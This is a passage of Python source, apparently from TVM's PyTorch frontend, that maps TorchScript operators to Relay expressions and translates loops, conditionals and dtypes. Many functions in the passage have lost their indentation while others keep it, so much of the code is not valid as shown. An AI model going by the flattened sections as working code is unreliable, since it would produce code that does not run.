return self.searchsorted_common(*inputs)
def bucketize(self, inputs, input_types):
return self.searchsorted_common(inputs[1], inputs[0], inputs[2], inputs[3])
def roll(self, inputs, input_types):
def slide_axes(inp, shape, ax):
axes = list(range(len(shape)))
axes = axes[:ax] + [-1] + axes[ax:-1]
return _op.transpose(inp, axes)
x = inputs[0]
shifts = inputs[1]
dims = inputs[2]
shape = self.infer_shape(x)
start = _expr.const(0, "int64")
step = _expr.const(1, "int64")
out = x
for i, dim in enumerate(dims):
roll_dim = _expr.const(shape[dim], "int64")
indices_1d = _op.mod(
_op.transform.arange(start, roll_dim, step, "int64")
- _expr.const(shifts[i], "int64")
+ roll_dim,
roll_dim,
)
# First fill in the last axis with roll indices, and then do transpose to
# bring the roll indices into the desired axis.
indices = slide_axes(
_op.tile(indices_1d, shape[:dim] + shape[dim + 1 :] + (1,)),
shape,
dim,
)
out = _op.gather(out, dim, indices)
return out
# Operator mappings
    def create_convert_map(self):
        """Populate self.convert_map: Torch operator kind -> converter.

        Keys are TorchScript operator kinds ("aten::*", "prim::*",
        "torchvision::*"); values are callables taking (inputs, input_types)
        and returning Relay expressions. In-place variants (trailing
        underscore) reuse the out-of-place converter.
        """
        self.convert_map = {
            "aten::is_floating_point": self.is_floating_point,
            "aten::pixel_shuffle": self.pixel_shuffle,
            "aten::device": self.none,
            "prim::device": self.none,
            "aten::sub": self.make_elemwise("subtract"),
            "aten::sub_": self.make_elemwise("subtract"),
            "aten::max": self.max,
            "aten::min": self.min,
            "aten::mul": self.make_elemwise("multiply"),
            "aten::mul_": self.make_elemwise("multiply"),
            "aten::pow": self.make_elemwise("power"),
            "aten::arange": self.arange,
            "aten::meshgrid": self.meshgrid,
            "aten::div": self.make_elemwise("divide"),
            "aten::div_": self.make_elemwise("divide"),
            "aten::floor_divide": self.make_elemwise("floor_divide"),
            "aten::floor_divide_": self.make_elemwise("floor_divide"),
            "aten::true_divide": self.make_elemwise("divide"),
            "aten::addcdiv": self.addcdiv,
            "aten::addcmul": self.addcmul,
            "aten::ones": self.ones,
            "aten::ones_like": self.ones_like,
            "aten::zeros": self.zeros,
            "aten::zeros_like": self.zeros_like,
            "aten::full": self.full,
            "aten::full_like": self.full_like,
            "aten::linspace": self.linspace,
            "aten::reciprocal": self.reciprocal,
            "aten::repeat": self.repeat,
            "aten::repeat_interleave": self.repeat_interleave,
            "aten::to": self.to,
            "aten::squeeze": self.squeeze,
            "aten::unsqueeze": self.unsqueeze,
            "aten::unsqueeze_": self.unsqueeze,
            "aten::cat": self.concatenate,
            "aten::slice": self.slice,
            "aten::narrow": self.narrow,
            "aten::split": self.split,
            "aten::split_with_sizes": self.split_with_sizes,
            "aten::select": self.select,
            "aten::take": self.take,
            "aten::where": self.where,
            "aten::topk": self.topk,
            # Activations.
            "aten::relu": self.relu,
            "aten::relu_": self.relu,
            "aten::prelu": self.prelu,
            "aten::leaky_relu": self.leaky_relu,
            "aten::leaky_relu_": self.leaky_relu,
            "aten::elu": self.elu,
            "aten::elu_": self.elu,
            "aten::celu": self.celu,
            "aten::gelu": self.gelu,
            "aten::selu": self.selu,
            "aten::silu": self.silu,
            "aten::silu_": self.silu,
            "aten::log_sigmoid": self.log_sigmoid,
            # Pooling: adaptive variants are bound to the matching Relay op
            # via functools.partial.
            "aten::adaptive_avg_pool1d": functools.partial(
                self.adaptive_avg_pool, _op.nn.adaptive_avg_pool1d
            ),
            "aten::adaptive_avg_pool2d": functools.partial(
                self.adaptive_avg_pool, _op.nn.adaptive_avg_pool2d
            ),
            "aten::adaptive_avg_pool3d": functools.partial(
                self.adaptive_avg_pool, _op.nn.adaptive_avg_pool3d
            ),
            "aten::adaptive_max_pool1d": functools.partial(
                self.adaptive_max_pool, _op.nn.adaptive_max_pool1d
            ),
            "aten::adaptive_max_pool2d": functools.partial(
                self.adaptive_max_pool, _op.nn.adaptive_max_pool2d
            ),
            "aten::adaptive_max_pool3d": functools.partial(
                self.adaptive_max_pool, _op.nn.adaptive_max_pool3d
            ),
            "aten::max_pool2d": self.maxpool_2d,
            "aten::max_pool2d_with_indices": self.maxpool_2d_with_indices,
            "aten::max_pool1d": self.maxpool_1d,
            "aten::max_pool3d": self.maxpool_3d,
            "aten::hardtanh": self.hardtanh,
            "aten::hardtanh_": self.hardtanh,
            "aten::_convolution": self.convolution,
            "aten::softmax": self.softmax,
            "aten::threshold": self.threshold,
            "aten::threshold_": self.threshold,
            "aten::contiguous": self.contiguous,
            # Normalization layers.
            "aten::batch_norm": self.batch_norm,
            "aten::instance_norm": self.instance_norm,
            "aten::layer_norm": self.layer_norm,
            "aten::group_norm": self.group_norm,
            "aten::transpose": self.transpose,
            "aten::transpose_": self.transpose,
            "aten::t": self.transpose,
            "aten::flatten": self.flatten,
            "aten::addmm": self.addmm,
            "aten::size": self.size,
            "aten::view": self.view,
            "aten::reshape": self.reshape,
            "aten::clone": self.clone,
            "aten::log_softmax": self.log_softmax,
            "aten::sigmoid": self.sigmoid,
            "aten::sigmoid_": self.sigmoid,
            "aten::softplus": self.softplus,
            "aten::avg_pool1d": self.make_avg_pool(1),
            "aten::avg_pool2d": self.make_avg_pool(2),
            "aten::avg_pool3d": self.make_avg_pool(3),
            "aten::linear": self.linear,
            "aten::dropout": self.dropout,
            "aten::dropout_": self.dropout,
            "aten::feature_dropout": self.dropout,
            "aten::alpha_dropout": self.dropout,
            "aten::mean": self.mean,
            "aten::chunk": self.chunk,
            "aten::unsafe_chunk": self.chunk,
            "aten::matmul": self.matmul,
            "aten::bmm": self.matmul,
            "aten::expand": self.expand,
            "aten::Int": self.int,
            "prim::NumToTensor": self.numtotensor,
            "prim::ImplicitTensorToNum": self.tensortonum,
            "aten::ScalarImplicit": self.tensortonum,
            # Padding modes map onto relay pad modes.
            "aten::constant_pad_nd": self.make_pad("constant"),
            "aten::reflection_pad1d": self.make_pad("reflect"),
            "aten::reflection_pad2d": self.make_pad("reflect"),
            "aten::replication_pad1d": self.make_pad("edge"),
            "aten::replication_pad2d": self.make_pad("edge"),
            "aten::replication_pad3d": self.make_pad("edge"),
            "aten::permute": self.transpose,
            # Reductions.
            "aten::sum": self.make_reduce("sum"),
            "aten::prod": self.make_reduce("prod"),
            "aten::argmin": self.make_reduce("argmin"),
            "aten::argmax": self.make_reduce("argmax"),
            "aten::norm": self.norm,
            "aten::frobenius_norm": self.frobenius_norm,
            "aten::std": self.std,
            "aten::var": self.variance,
            # Elementwise unary math.
            "aten::abs": self.make_unary("abs"),
            "aten::neg": self.make_unary("negative"),
            "aten::cos": self.make_unary("cos"),
            "aten::cosh": self.make_unary("cosh"),
            "aten::sin": self.make_unary("sin"),
            "aten::sinh": self.make_unary("sinh"),
            "aten::tan": self.make_unary("tan"),
            "aten::tanh": self.make_unary("tanh"),
            "aten::tanh_": self.make_unary("tanh"),
            "aten::acos": self.make_unary("acos"),
            "aten::asin": self.make_unary("asin"),
            "aten::atan": self.make_unary("atan"),
            "aten::log": self.make_unary("log"),
            "aten::log2": self.make_unary("log2"),
            "aten::log10": self.make_unary("log10"),
            "aten::log1p": self.log1p,
            "aten::exp": self.make_unary("exp"),
            "aten::erf": self.make_unary("erf"),
            "aten::trunc": self.make_unary("trunc"),
            "aten::sign": self.make_unary("sign"),
            "aten::sqrt": self.make_unary("sqrt"),
            "aten::rsqrt": self.make_unary("rsqrt"),
            "aten::ceil": self.make_unary("ceil"),
            "aten::floor": self.make_unary("floor"),
            "aten::floor_": self.make_unary("floor"),
            "aten::round": self.make_unary("round"),
            "aten::isfinite": self.make_unary("isfinite"),
            "aten::isinf": self.make_unary("isinf"),
            "aten::isnan": self.make_unary("isnan"),
            "aten::clamp": self.clamp,
            "aten::clamp_": self.clamp,
            "aten::detach": self.identity,
            # Upsampling / interpolation.
            "aten::upsample_bilinear2d": self.make_upsample("linear"),
            "aten::upsample_bicubic2d": self.make_upsample("cubic"),
            "aten::upsample_nearest2d": self.make_upsample("nearest_neighbor"),
            "aten::upsample_trilinear3d": self.make_upsample3d("linear"),
            "aten::upsample_nearest3d": self.make_upsample3d("nearest_neighbor"),
            "aten::expand_as": self.expand_as,
            # Comparisons and logic.
            "aten::lt": self.make_elemwise("less"),
            "aten::gt": self.make_elemwise("greater"),
            "aten::le": self.make_elemwise("less_equal"),
            "aten::ge": self.make_elemwise("greater_equal"),
            "aten::ne": self.make_elemwise("not_equal"),
            "aten::eq": self.make_elemwise("equal"),
            "aten::logical_not": self.logical_not,
            "aten::logical_xor": self.logical_xor,
            "aten::bitwise_not": self.bitwise_not,
            "aten::bitwise_xor": self.bitwise_xor,
            "aten::Bool": self.Bool,
            "aten::Float": self.Float,
            "aten::rsub": self.rsub,
            "aten::embedding": self.embedding,
            "aten::one_hot": self.one_hot,
            "aten::mm": self.matmul,
            "aten::add": self.add,
            "aten::add_": self.add,
            "aten::stack": self.stack,
            "aten::__getitem__": self.list_getitem,
            "aten::len": self.list_len,
            "aten::type_as": self.type_as,
            "aten::gather": self.gather,
            "aten::index_select": self.select,
            "aten::index": self.index,
            "torchvision::nms": self.nms,
            "aten::logsumexp": self.logsumexp,
            "torchvision::roi_align": self.roi_align,
            "torchvision::deform_conv2d": self.deform_conv2d,
            "aten::unbind": self.unbind,
            "aten::__and__": self.logical_and,
            "aten::logical_and": self.logical_and,
            "aten::_shape_as_tensor": self.shape_as_tensor,
            "aten::nonzero": self.nonzero,
            "aten::nonzero_numpy": self.nonzero_numpy,
            "aten::scatter": self.scatter,
            "aten::index_put": self.index_put,
            "aten::index_put_": self.index_put,
            "aten::scalar_tensor": self.scalar_tensor,
            "aten::__interpolate": self.interpolate,
            "aten::IntImplicit": self.identity,
            "aten::tensor": self.identity,  # used for example in tensor(1.0)
            "aten::numel": self.numel,
            "aten::empty": self.empty,
            "aten::bincount": self.bincount,
            "aten::scatter_add": self.scatter_add,
            "aten::__not__": self.logical_not,
            "aten::hardswish_": self.hard_swish,
            "aten::hardswish": self.hard_swish,
            "aten::hardsigmoid_": self.hard_sigmoid,
            "aten::hardsigmoid": self.hard_sigmoid,
            "aten::cumsum": self.cumsum,
            "aten::masked_fill": self.masked_fill,
            "aten::masked_fill_": self.masked_fill,
            "aten::masked_select": self.masked_select,
            "aten::argsort": self.argsort,
            "aten::sort": self.sort,
            "aten::_unique2": self.unique,
            "aten::nll_loss": self.nll_loss,
            "aten::nll_loss2d": self.nll_loss,
            "aten::flip": self.flip,
            # Recurrent networks.
            "aten::gru": self.gru,
            "aten::lstm": self.lstm,
            "aten::all": functools.partial(self.all_any_common, _op.all),
            "aten::any": functools.partial(self.all_any_common, _op.any),
            "aten::searchsorted": self.searchsorted,
            "aten::bucketize": self.bucketize,
            "aten::roll": self.roll,
        }
def update_convert_map(self, custom_map):
self.convert_map.update(custom_map)
def report_missing_conversion(self, op_names):
"""Check if all ops in an input graph are supported by TVM"""
known_ops = [
"prim::Constant",
"prim::GetAttr",
"prim::ListConstruct",
"prim::ListUnpack",
"prim::TupleConstruct",
"prim::TupleUnpack",
"prim::RaiseException",
"prim::If",
"prim::Loop",
]
known_ops += list(self.convert_map.keys())
known_ops += list(qnn_torch.convert_map.keys())
missing = [op_name for op_name in op_names if op_name not in known_ops]
if missing:
msg = "The following operators are not implemented: {}".format(missing)
raise NotImplementedError(msg)
def convert_block(self, block, outputs):
"""Translate Torch "Block", used for prim::If and prim::Loop"""
ops = _get_operator_nodes(block.nodes())
ret_names = _get_input_names(block.returnNode())
return self.convert_operators(ops, outputs, ret_names)
def convert_if(self, if_node, outputs):
"""Translate Torch prim::If to Relay If"""
cond = outputs[if_node.inputsAt(0).debugName()]
blocks = list(if_node.blocks())
true_branch = self.convert_block(blocks[0], outputs)
false_branch = self.convert_block(blocks[1], outputs)
assert len(true_branch) == 1 and len(false_branch) == 1
return _expr.If(cond, true_branch[0], false_branch[0])
    def convert_loop(self, loop_node, outputs):
        """Translate Torch prim::Loop to Relay while_loop.

        Returns one Relay expression per Torch loop variable (the internal
        iteration counter / condition is stripped from the result).
        """

        def get_input(index):
            # Resolve the loop input at *index*: fold prim::Constant inputs,
            # otherwise look up the already-converted value by debug name.
            ivalue = loop_node.inputsAt(index)
            inode = ivalue.node()
            if inode.kind() == "prim::Constant":
                return _expr.const(_get_constant(inode))
            var_name = ivalue.debugName()
            assert var_name in outputs
            return _wrap_const(outputs[var_name])

        # Refer to the spec for prim::Loop below
        # https://github.com/pytorch/pytorch/blob/master/torch/csrc/jit/OVERVIEW.md#loops
        # The first input: %max_trip_count
        # The second input: %initial_condition
        # The rest of input: loop variables
        max_loop_count = get_input(0)
        init_cond = get_input(1)
        num_loop_var = len(list(loop_node.inputs())) - 2
        init_vals = [get_input(i + 2) for i in range(num_loop_var)]

        # while loop has always max_loop_count being int64 max
        # max_loop_count.data (tvm.runtime.NDArray) is -1, so _get_constant again
        is_while_loop = (
            isinstance(max_loop_count, _expr.Constant)
            and _get_constant(loop_node.inputsAt(0).node()) == sys.maxsize
        )

        if is_while_loop:
            loop_iter_dtype = "bool"
            # while loop with non input dependent condition such as while i < 10:
            # init_cond is int, need to cast to bool to type check
            if isinstance(init_cond, _expr.Constant):
                init_cond = _op.cast(init_cond, "bool")
            init_loop_iter_val = init_cond
        else:
            loop_iter_dtype = "int32"
            # always count from 0
            init_loop_iter_val = _expr.const(0, dtype="int32")

        body_block = list(loop_node.blocks())[0]
        block_input_names = _get_input_names(body_block)
        num_block_inputs = len(block_input_names)
        # Seed the body block's input names with the initial values so
        # convert_block can resolve them.
        name_val_pairs = list(zip(block_input_names, [init_loop_iter_val] + init_vals))
        outputs.update(name_val_pairs)

        def get_var(name, val):
            # Build a Relay var for a loop-carried value, using the inferred
            # type when available; zero-sized dims become dynamic (Any).
            if val:
                checked_type = self.infer_type_with_prelude(val)
                if hasattr(checked_type, "shape"):
                    shape = get_const_tuple(checked_type.shape)
                    actual_shape = []
                    for dim in shape:
                        if isinstance(dim, int) and dim == 0:
                            actual_shape.append(Any())
                        else:
                            actual_shape.append(dim)
                    return _expr.var(name, shape=actual_shape, dtype=checked_type.dtype)
                else:
                    return _expr.var(name, type_annotation=checked_type)
            return _expr.var(name)

        loop_iter_var = _expr.var(block_input_names[0], shape=(), dtype=loop_iter_dtype)
        loop_vars = [get_var(name, val) for name, val in name_val_pairs[1:]]

        # Add non constant free variables to loop variables to prevent code blow up
        # Without this, if there are two for loops in a row, which often happens
        # if the outer loop is unrolled, the computation corresponding to the first for loop
        # is inlined inside loop body, turning O(N) + O(N) computation into O(N^2).
        # This issue was found when converting from Stacked LSTM test. Torch does not add the
        # output of the earlier loop into loop variables of the next loop.
        # So the variable corresponding to the first loop output appears free in the second
        # loop body.
        free_vars = [
            var
            for var in _get_free_vars_from_block(body_block)
            if var in outputs
            and not isinstance(outputs[var], (_expr.Constant, int, float, str))
            and outputs[var]
        ]

        prev_outputs = {}
        for name in free_vars:
            prev_output = outputs[name]
            new_loop_var = get_var(name, prev_output)
            prev_outputs[name] = prev_output
            outputs[name] = new_loop_var
            loop_vars.append(new_loop_var)
            init_vals.append(prev_output)

        def cond(*current_vals):
            # Loop guard: boolean flag for while loops, counter bound for fors.
            i = current_vals[0]

            if is_while_loop:
                return _op.equal(i, _expr.const(True, "bool"))

            return _op.less(i, max_loop_count)

        def body(*current_vals):
            # Update loop variables using the prev iteration outputs
            assert len(current_vals) == num_block_inputs + len(free_vars)

            for (i, val) in enumerate(current_vals):
                if i < num_block_inputs:
                    outputs[block_input_names[i]] = val
                else:
                    outputs[free_vars[i - num_block_inputs]] = val

            block_outputs = self.convert_block(body_block, outputs)
            block_outputs += [outputs[name] for name in free_vars]

            if not is_while_loop:
                # iter var increment implicit in torch, so do it manually
                # for while loop, block_outputs[0] is already a boolean,
                # the result of termination check
                incr = _expr.const(1, dtype="int32")
                block_outputs[0] = current_vals[0] + incr

            return block_outputs

        loop = while_loop(cond, [loop_iter_var] + loop_vars, body)
        loop_val = loop(init_loop_iter_val, *init_vals)

        # restore original output values for free vars
        outputs.update(prev_outputs)

        # The first element is a loop counter or boolean condition, ignore it
        return [_expr.TupleGetItem(loop_val, i + 1) for i in range(num_loop_var)]
def convert_operators(self, operators, outputs, ret_names):
"""Convert each Torch IR operators to Relay equivalent"""
# an op node might not belong to any of scope in trace info natively
# use a cunter to prevent from messing up its scope in span
empty_counter = 0
for node_name, op_node in operators:
operator = op_node.kind()
inputs = _get_op_inputs(op_node, outputs)
if operator == "prim::Constant":
outputs[node_name] = _get_constant(op_node)
elif operator == "prim::ListConstruct" and _should_construct_dynamic_list(op_node):
outputs[node_name] = self.convert_to_list_adt(inputs)
elif operator == "prim::ListConstruct":
# This assumes that no more elements will be appended to this list
# In this case, we keep the Python list
outputs[node_name] = inputs
elif operator == "prim::TupleConstruct":
outputs[node_name] = _expr.Tuple(inputs)
elif operator in ["prim::ListUnpack", "prim::TupleUnpack"]:
assert len(inputs) == 1
if isinstance(inputs[0], (list, _expr.TupleWrapper)):
unpacked = inputs[0]
else:
unpacked = _unpack_tuple(inputs[0])
outputs.update(zip(_get_output_names(op_node), unpacked))
elif operator == "prim::prim::RaiseException":
logging.warning("raising exceptions is ignored")
outputs[node_name] = None
elif operator == "prim::If":
if_out = self.convert_if(op_node, outputs)
outputs[node_name] = if_out
elif operator == "prim::Loop":
loop_out = self.convert_loop(op_node, outputs)
unpacked_names = _get_output_names(op_node)
assert len(loop_out) == len(unpacked_names)
outputs.update(zip(unpacked_names, loop_out))
else:
relay_op = self.convert_map[operator]
relay_out = relay_op(
inputs, _get_input_types(op_node, outputs, default_dtype=self.default_dtype)
)
span_str, empty_counter = self._get_torch_span(op_node, empty_counter)
relay_out = set_span(relay_out, span_str)
self.record_output_type(relay_out)
if isinstance(relay_out, tuple):
# This is for torch operators that return multiple outputs
# See _adaptive_max_2d above for example
out_names = _get_output_names(op_node)
outputs.update(zip(out_names, relay_out))
else:
assert op_node.outputsSize() == 1
outputs[node_name] = relay_out
return [_wrap_const(outputs[ret_name]) for ret_name in ret_names]
def _get_torch_span(self, node, empty_counter):
# torch span looks like
# %input.5 : Float(...) = aten::relu_(%input.3), scope: __module.relu # ${torch}/nn file
# the scope part might not exist
if node.scopeName():
scope_name_str = "jit._trace.TopLevelTracedModule: " + node.scopeName()
else:
scope_name_str = "warning: no trace info " + str(empty_counter)
empty_counter += 1
span_str = "C.graph: {}, {}".format(node.kind(), scope_name_str)
return span_str, empty_counter
def _pytorch_result_type(dtypes, non_tensor_inputs):
"""This promotes TVM dtypes like PyTorch would"""
import torch
dtype_map = {
"float64": torch.float64,
"float32": torch.float32,
"float16": torch.float16,
"bfloat16": torch.bfloat16,
"int64": torch.int64,
"int32": torch.int32,
"int16": torch.int16,
"int8": torch.int8,
"uint8": torch.uint8,
"bool": torch.bool,
}
if len(dtypes) > 0:
result_type = dtypes[0]
for dt in dtypes[1:]:
if dt != result_type: # we don't want to work with same types as we
# don't do quantized here (which cannot be promoted?)
result_type = _convert_data_type(
str(
torch.result_type(
torch.zeros((), dtype=dtype_map[result_type]),
torch.zeros((), dtype=dtype_map[dt]),
)
)
)
else:
result_type = "bool" # this is the smallest type...
for inp in non_tensor_inputs:
result_type = _convert_data_type(
str(torch.result_type(torch.zeros((), dtype=dtype_map[result_type]), inp))
)
return result_type
# Helper functions for operator implementation
def _convert_dtype_value(val):
    """Convert a PyTorch numeric ScalarType id to a TVM dtype string.

    *val* is the integer dtype code attached to torch graph nodes (e.g. the
    dtype argument of aten::to); None defaults to torch.int64. Raises
    NotImplementedError for unhandled codes.
    """
    convert_torch_dtype_map = {
        7: "torch.float64",
        6: "torch.float32",
        5: "torch.float16",
        4: "torch.int64",
        3: "torch.int32",
        2: "torch.int16",
        1: "torch.int8",
        # BUGFIX: was "torch.unit8" (typo), which _convert_data_type rejects
        # with NotImplementedError for dtype code 0 (uint8).
        0: "torch.uint8",
        None: "torch.int64",
    }  # Default is torch.int64
    if val in convert_torch_dtype_map:
        return _convert_data_type(convert_torch_dtype_map[val])
    msg = "Torch data type value %d is not handled yet." % (val)
    raise NotImplementedError(msg)
def _convert_data_type(input_type, default_dtype=None):
"""converts the PyTorch scalar type input_type to a TVM dtype.
optionally, default_dtype can be a TVM dtype that is used
if input_type is None (but not when it is unknown)"""
if input_type is None and default_dtype is not None:
return default_dtype
input_type = input_type.lower()
if input_type in ["double", "float64", "torch.float64"]:
return "float64"
elif input_type in ["float", "float32", "torch.float32"]:
return "float32"
elif input_type in ["half", "float16", "torch.float16"]:
return "float16"
elif input_type in ["long", "int64", "torch.int64"]:
return "int64"
elif input_type in ["int", "int32", "torch.int32"]:
return "int32"
elif input_type in ["short", "int16", "torch.int16"]:
return "int16"
elif input_type in ["char", "int8", "torch.int8"]:
return "int8"
elif input_type in ["byte", "uint8", "torch.uint8"]:
return "uint8"
elif input_type in ["quint8", "torch.quint8"]:
return "quint8"
elif input_type in ["qint8", "torch.qint8"]:
return "qint8"
elif input_type in ["qint32", "torch.qint32"]:
return "qint32"
elif input_type in ["bool", "torch.bool"]:
return "bool"
elif input_type in ["str"]:
return "str"
else:
raise NotImplementedError("input_type {} is not handled yet".format(input_type))
return "float32" # Never reached
def _create_typed_const(data, dtype):
    """create a (scalar) constant of given value and dtype.
    dtype should be a TVM dtype"""
    np_ctor_by_dtype = {
        "float64": np.float64,
        "float32": np.float32,
        "float16": np.float16,
        "int64": np.int64,
        "int32": np.int32,
        "int16": np.int16,
        "int8": np.int8,
        "uint8": np.uint8,
    }
    ctor = np_ctor_by_dtype.get(dtype)
    if ctor is None:
        raise NotImplementedError("input_type {} is not handled yet".format(dtype))
    return _expr.const(ctor(data), dtype=dtype)
def _wrap_const(c):
    """Wrap a plain Python value in a Relay constant; pass expressions, lists,
    and dynamic dims through untouched."""
    if isinstance(c, (_expr.Expr, list, tvm.tir.expr.Any)):
        return c
    return _expr.const(c)
def _run_jit_passes(graph):
    """The inline pass is necessary to unwrap prim::CallMethod"""
    # pylint: disable=c-extension-no-member
    import torch

    if not is_version_greater_than("1.5.1"):
        torch._C._jit_pass_inline(graph)
        return
    # This is required for torchvision detection models from 1.6 above
    # It is the same as _jit_pass_inline, except that it has some special
    # case behaviors for some ops such as aten::__interpolate()
    torch._C._jit_pass_onnx_function_substitution(graph)
def _get_tensor_and_var(torch_tensor, name):
    """Convert a torch tensor into a TVM NDArray plus a matching Relay var."""
    ndarray = tvm.nd.array(torch_tensor.cpu().numpy())
    relay_var = _expr.var(name, shape=ndarray.shape, dtype=ndarray.dtype)
    return ndarray, relay_var
def _get_output_name(node):
assert node.outputsSize() == 1
return node.output().debugName()
def _get_output_names(node):
return [output.debugName() for output in node.outputs()]
def _get_input_names(node_or_graph):
return [inp.debugName() for inp in node_or_graph.inputs()]
def _get_op_inputs(op_node, outputs):
    """Look up the already-converted value for each input of *op_node*."""
    values = []
    for input_name in _get_input_names(op_node):
        values.append(outputs[input_name])
    return values
def _get_node_type(node):
assert node.outputsSize() == 1
return node.output().type().kind()
def _get_uses(node):
uses = []
for output in node.outputs():
uses += output.uses()
return uses
def _get_users(node):
    """Return the user node of every use of *node*'s outputs."""
    users = []
    for use in _get_uses(node):
        users.append(use.user)
    return users
def _getattr_attr_name(node):
attribute_names = node.attributeNames()
assert len(attribute_names) == 1
attr_name = node.s(attribute_names[0])
return attr_name
def _getattr_full_name(getattrs, sep="."):
    """Join the attribute names of a chain of prim::GetAttr nodes with *sep*."""
    return sep.join(_getattr_attr_name(node) for node in getattrs)
def _get_pytorch_value_type(typ, default_dtype="float32"):
kind = typ.kind()
if kind == "TensorType":
if typ.scalarType() is None:
# Tensor's type can be unknown if we use torch.jit.script(...)
# Defaults can be passed in, if not it is float32
logging.warning("Untyped Tensor found, assume it is %s", default_dtype)
return default_dtype
else:
return _convert_data_type(typ.scalarType())
elif kind == "ListType":
return "ListType"
elif kind in ["IntType", "FloatType", "BoolType", "StringType", "OptionalType"]:
pt_dtype = str(typ).lower()
dtype = pt_dtype if pt_dtype == "OptionalType" else _convert_data_type(pt_dtype)
return dtype
else:
return "UnsupportedType"
def _get_input_types(op_node, outputs, default_dtype="float32"):
    """Returns a TVM dtype for each input nodes derived from the torch type"""
    in_types = []
    for inp in op_node.inputs():
        if inp.node().kind() == "prim::GetAttr":
            # GetAttr nodes always return None when we call scalarType() on it
            name = inp.debugName()
            assert name in outputs
            if isinstance(outputs[name], _expr.Var):
                # The Relay var already carries the dtype attached when the
                # parameter was converted.
                in_types.append(outputs[name].type_annotation.dtype)
            else:
                # For quantized modules with parameters, here we would get
                # "prim::GetAttr[name="_packed_params"]". Since the dtype corresponding to
                # _packed_params is not needed by quantized ops, we return an arbitrary type.
                in_types.append(default_dtype)
        else:
            in_types.append(_get_pytorch_value_type(inp.type(), default_dtype=default_dtype))
    return in_types
def _get_constant(node):
    """Retrieve the Python/Relay value of a prim::Constant node.

    Returns None both for attribute-less constants and FunctionType
    constants; tensors come back as Relay constants (or a Python scalar for
    0-dim tensors).
    """
    attribute_names = node.attributeNames()
    num_attributes = len(attribute_names)
    if num_attributes == 1:
        attr_name = attribute_names[0]
        ty = node.output().type().kind()
        if ty == "IntType":
            return node.i(attr_name)
        elif ty == "BoolType":
            return bool(node.i(attr_name))
        elif ty in ["FloatType", "LongType"]:
            # NOTE(review): LongType is read via node.f (the float accessor),
            # which looks odd — confirm against torch's attribute storage.
            return node.f(attr_name)
        elif ty in ["TensorType", "CompleteTensorType"]:
            tensor = node.t(attr_name)
            if tensor.is_cuda:
                tensor = tensor.cpu()
            if len(tensor.shape) == 0:  # tensor(0.1)
                # TODO(t-vi): When is this needed?
                return tensor.item()
            return _wrap_const(tensor.numpy())
        elif ty in ["DeviceObjType", "StringType"]:
            return node.s(attr_name)
        elif ty == "FunctionType":
            return None
        else:
            raise NotImplementedError("Unsupported type: %s" % ty)
    else:
        # Constants with no attributes carry the value None.
        assert num_attributes == 0
        return None
def _get_operator_nodes(nodes):
    """Collect (name, node) pairs for torch IR nodes needing Relay conversion.

    Nodes without outputs and prim::GetAttr nodes (handled separately as
    parameters) are skipped. Multi-output nodes are named by joining their
    output names with underscores.
    """
    ops = []
    for node in nodes:
        n_outputs = node.outputsSize()
        if n_outputs == 0 or node.kind() == "prim::GetAttr":
            continue
        if n_outputs == 1:
            node_name = _get_output_name(node)
        else:
            node_name = "_".join(_get_output_names(node))
        ops.append((node_name, node))
    return ops
def _get_relay_input_vars(graph, input_infos, prelude, is_module=True, default_dtype="float32"):
    """
    Return Relay vars from input shapes and create entries based on
    expected graph inputs - to allow translation.

    ``input_infos`` is a list of ('name', shape) or ('name', (shape, dtype))
    tuples, one per (non-self) graph input; the result maps each graph
    input's debug name to a typed Relay var carrying the user-chosen name.
    """
    graph_inputs = list(graph.inputs())
    if is_module:
        # a module has "self" as first input, which we do not need/want
        graph_inputs = graph_inputs[1:]
    if not isinstance(input_infos, list):
        msg = "Graph inputs input_infos should be a list"
        raise RuntimeError(msg)
    if len(graph_inputs) != len(input_infos):
        msg = "PyTorch has {} inputs and input_infos lists {}.".format(
            len(graph_inputs), len(input_infos)
        )
        raise RuntimeError(msg)
    def get_relay_ty(ishape, itype, pt_type):
        # Recursively build a Relay type from the user shape/dtype info and
        # the TorchScript type of the corresponding graph input.
        if pt_type.kind() == "TensorType":
            if not (_is_int_seq(ishape) or len(ishape) == 0):
                msg = "Shape for Tensors must be lists of ints"
                raise RuntimeError(msg)
            if (pt_type.dim() is not None and pt_type.dim() != len(ishape)) or (
                pt_type.sizes() is not None
                and any([s1 != s2 for s1, s2 in zip(pt_type.sizes(), ishape)])
            ):
                msg = "Shapes of input list and information in the graph do not match"
                raise RuntimeError(msg)
            pt_dtype = pt_type.scalarType()
            if not pt_dtype and itype:
                # Graph carries no scalar type; fall back to the user dtype.
                pt_dtype = itype
            dtype = _convert_data_type(pt_dtype, default_dtype=default_dtype)
            return TensorType(ishape, dtype)
        elif pt_type.kind() == "TupleType":
            if not isinstance(ishape, tuple):
                msg = "Shapes for tuples must be tuples"
                raise RuntimeError(msg)
            return TupleType(
                [get_relay_ty(elem, itype, pt_t) for elem, pt_t in zip(ishape, pt_type.elements())]
            )
        elif pt_type.kind() == "ListType":
            if not isinstance(ishape, list):
                msg = "Shapes for lists must be lists"
                raise RuntimeError(msg)
            pt_elemtype = pt_type.getElementType()
            elem_tys = [get_relay_ty(s, itype, pt_elemtype) for s in ishape]
            # Relay lists are homogeneous, so all element types must agree.
            if len(elem_tys) > 0 and not all(map(lambda ty: ty == elem_tys[0], elem_tys)):
                msg = "List elements need have identical types"
                raise RuntimeError(msg)
            rlist, _, _ = prelude.mod.get_type("List")
            return rlist(elem_tys[0])
        elif pt_type.kind() == "OptionalType":
            # we do not support None yet, so we fill in the type
            return get_relay_ty(ishape, itype, pt_type.getElementType())
        # TODO: scalar inputs
        raise NotImplementedError("unsupported input type")
    input_vars = {}
    # Normalize every entry to the ('name', (shape, dtype)) form.
    new_input_infos = []
    for num, inp in enumerate(input_infos):
        if not isinstance(inp, tuple):
            msg = "Graph input {} is not a tuple".format(num)
            raise RuntimeError(msg)
        if len(inp) != 2 or not isinstance(inp[0], str):
            msg = (
                "Graph input {} is not valid,"
                " expected ('name', shape) or ('name', (shape, dtype))".format(inp)
            )
            raise RuntimeError(msg)
        if not isinstance(inp[1], tuple) or len(inp[1]) == 0 or not isinstance(inp[1][-1], str):
            new_input_infos.append((inp[0], (inp[1], default_dtype)))
        else:
            new_input_infos.append(inp)
    input_types = [
        (name, get_relay_ty(info[0], info[1], gi.type()))
        for (name, info), gi in zip(new_input_infos, graph_inputs)
    ]
    ir_inputs = [i.debugName() for i in graph_inputs]
    for ir_input, (name, itype) in zip(ir_inputs, input_types):
        inp = _expr.var(name, type_annotation=itype)
        # Translate from graph input to user input name
